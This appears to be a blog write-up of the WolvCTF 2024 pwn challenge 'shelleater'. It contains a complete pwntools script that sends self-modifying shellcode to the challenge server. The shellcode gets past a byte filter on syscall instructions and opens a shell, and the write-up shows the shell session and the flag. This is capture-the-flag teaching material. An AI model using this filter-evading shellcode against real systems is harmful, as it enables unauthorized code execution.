1.5 KiB
1.5 KiB
| title | date | tags | ||
|---|---|---|---|---|
| WolvCTF 2024 - Pwn: shelleater | 2024-03-20 |
|
Task
go ahead, give me a shell >;)
nc shelleater.wolvctf.io 1337
Author: beanmitePoints: 100Solves: 82 / 622 (13.183%)
Writeup
In this challenge, the program will read some shellcode from stdin and run it as long as 0x80 (part of int 0x80 instruction) and 0x0f 0x05 (syscall instruction) are not present anywhere in our code.
We can easily bypass this by making our code self-modifying:
from pwn import asm, remote
sc = asm('''
xor rax, rax
push rax
add rax, 59
mov rdi, 0x68732f2f6e69622f
push rdi
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
add dword ptr [rsp + 49], 1
.byte 0xe
.byte 0x05
''', arch='x86-64')
p = remote('shelleater.wolvctf.io', 1337)
p.send(sc)
p.interactive()
This shellcode sets up everything for an execve("/bin//sh", 0, 0) syscall, then adds 1 to the next byte of the shellcode, changing the 0E 05 into 0F 05, causing the syscall instruction to be executed.
After running the script, we can get the flag with the following commands:
$ python s.py
[+] Opening connection to shelleater.wolvctf.io on port 1337: Done
[*] Switching to interactive mode
== proof-of-work: disabled ==
shell go here :)
$ ls
chal
flag.txt
$ cat flag.txt
wctf{1_s3ash3ll_1_3at_1t}